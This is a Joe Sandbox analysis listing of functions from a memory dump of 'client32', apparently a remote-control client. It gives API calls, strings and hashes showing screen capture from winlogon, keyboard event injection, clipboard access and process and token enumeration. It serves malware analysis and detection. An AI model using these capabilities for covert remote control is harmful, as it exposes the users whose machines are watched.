                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock
                                                                                  • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                  • API String ID: 2752051264-327499879
                                                                                  • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                  • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                  • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                  • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                  Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                  • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountIconicTick
                                                                                  • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                  • API String ID: 1307367305-2838568823
                                                                                  • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                  • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                  • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                  • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                  Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                  • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                  • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$BringCurrentIconicShowThread
                                                                                  • String ID:
                                                                                  • API String ID: 4184413098-0
                                                                                  • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                  • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                  • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                  • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                  Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                  • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ControlDevicekeybd_event
                                                                                  • String ID:
                                                                                  • API String ID: 1421710848-0
                                                                                  • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                  • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                  • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                  • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                  Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                  • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$DataFormatName
                                                                                  • String ID:
                                                                                  • API String ID: 3172747766-0
                                                                                  • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                  • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                  • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                  • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                  Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                  • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                  • API String ID: 2942389153-3574733319
                                                                                  • Opcode ID: f1fcfdfcebd535121605e78cbc7b6af66c1befebb3baa01e0cc626f757530eba
                                                                                  • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                  • Opcode Fuzzy Hash: f1fcfdfcebd535121605e78cbc7b6af66c1befebb3baa01e0cc626f757530eba
                                                                                  • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                  Function 110B3100 Relevance: 52.7, APIs: 23, Strings: 7, Instructions: 178filewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                  • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                  • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                  • GetDC.USER32(00000000), ref: 110B31E8
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                  • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                  • GetTickCount.KERNEL32 ref: 110B323F
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                  • GetTickCount.KERNEL32 ref: 110B327F
                                                                                  • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                  • GdiFlush.GDI32 ref: 110B32A2
                                                                                  • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                  • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                  • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                  • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                  • String ID: @Ls$Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                  • API String ID: 2071925733-1846869080
                                                                                  • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                  • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                  • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                  • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                  Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                  • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                    • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                    • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                  • wsprintfA.USER32 ref: 1100553D
                                                                                  • DeleteObject.GDI32(?), ref: 11005592
                                                                                  • DeleteObject.GDI32(?), ref: 1100559B
                                                                                  • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                  • DeleteObject.GDI32(?), ref: 110055B8
                                                                                  • DeleteDC.GDI32(?), ref: 110055BE
                                                                                  • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                  • DeleteObject.GDI32(?), ref: 110055D8
                                                                                  • DeleteDC.GDI32(?), ref: 110055DE
                                                                                  • DeleteObject.GDI32(?), ref: 110055EF
                                                                                  • DeleteObject.GDI32(?), ref: 1100561A
                                                                                  • DeleteObject.GDI32(?), ref: 11005638
                                                                                  • DeleteObject.GDI32(?), ref: 11005641
                                                                                  • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                  • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                  • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                  • API String ID: 2789700732-770455996
                                                                                  • Opcode ID: 56834972750135d32d4936fb2241e5d15490fd94ea77fe3d08ec2b617cfa6d3e
                                                                                  • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                  • Opcode Fuzzy Hash: 56834972750135d32d4936fb2241e5d15490fd94ea77fe3d08ec2b617cfa6d3e
                                                                                  • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                  Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,50D94AA1,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                    • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,76230BD0,00000000), ref: 11138283
                                                                                    • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                    • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                    • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                    • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                    • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                  • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                                  • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                                  • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                                  • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                  • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                  • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                    • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                    • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                    • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                  • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                  • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
